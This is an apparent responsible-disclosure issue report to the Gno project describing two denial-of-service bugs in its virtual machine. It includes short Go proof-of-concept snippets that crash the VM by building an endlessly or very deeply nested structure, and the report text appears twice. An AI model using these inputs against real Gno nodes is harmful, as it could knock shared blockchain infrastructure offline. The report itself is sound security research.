Gno: An interpreted, stack-based Go virtual machine to build succinct and composable apps + Gno.land: a blockchain for timeless code and fair open-source.
Two critical VM issues (denial of service attacks)
Hey everyone, I am a Web3 cybersecurity researcher working for Hacken specializing in layer 1 protocols and virtual machines. I met with the Gno team during Web3 Summit in Berlin where they introduced me to your project. I promised to check it out because it sounded very interesting to me. I spent a day playing with your project and virtual machine and managed to find two ways to crash it.
Critical issues
Crashing VM due to out-of-memory error by allocating a huge slice:
Crashing VM by creating very deep structure which is very CPU-intensive to process:
func init() {
var x interface{}
for {
x = [1]interface{}{x}
}
}
or alternatively:
package main
func main() {
var x interface{}
for i := 0; i < 10000; i++ {
x = [1]interface{}{x}
}
for i := 0; i < 10000; i++ {
println(x)
}
}
I used the following test to reproduce these issues: crash_test.go.zip. You should put it in gno.land/pkg/sdk/vm and run it there with go test -v -run TestVMCrash.
Next steps
I highly recommend introducing Fuzzing in your project and undergoing a full audit before launching your product.
Feel free to contact me here or by sending an email to b.barwikowski@hacken.io if you need any help.
Two critical VM issues (denial of service attacks)
Hey everyone, I am a Web3 cybersecurity researcher working for Hacken specializing in layer 1 protocols and virtual machines. I met with the Gno team during Web3 Summit in Berlin where they introduced me to your project. I promised to check it out because it sounded very interesting to me. I spent a day playing with your project and virtual machine and managed to find two ways to crash it.
Critical issues
Crashing VM due to out-of-memory error by allocating a huge slice:
Crashing VM by creating very deep structure which is very CPU-intensive to process:
or alternatively:
I used the following test to reproduce these issues: crash_test.go.zip. You should put it in
gno.land/pkg/sdk/vm
and run it there withgo test -v -run TestVMCrash
.Next steps
I highly recommend introducing Fuzzing in your project and undergoing a full audit before launching your product.
Feel free to contact me here or by sending an email to b.barwikowski@hacken.io if you need any help.